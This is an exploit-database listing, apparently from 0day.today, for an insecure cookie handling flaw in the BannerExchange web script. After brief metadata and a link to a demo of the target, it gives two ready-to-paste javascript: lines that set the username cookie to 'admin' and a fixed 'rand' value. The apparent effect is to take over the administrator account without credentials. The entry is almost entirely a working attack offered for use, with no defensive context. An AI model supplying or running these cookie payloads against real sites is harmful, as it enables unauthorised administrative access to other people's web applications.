BannerExchange insecure cookie handling vulnerability

2010-02-10T00:00:00
ID 1337DAY-ID-10823
Type zdt
Reporter JiKo
Modified 2010-02-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
BannerExchange insecure cookie handling vulnerability
=====================================================

[~]-----------|01|
    -{Script}
    name :BannerExchange
    link :http://www.ezonescripts.com/productdemos/BannerExchange/account.php?action=account

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="bannerexchangename=admin; path=/";
    javascript:document.cookie="bannerexchangerand=905; path=/";



#  0day.today [2018-01-17]  #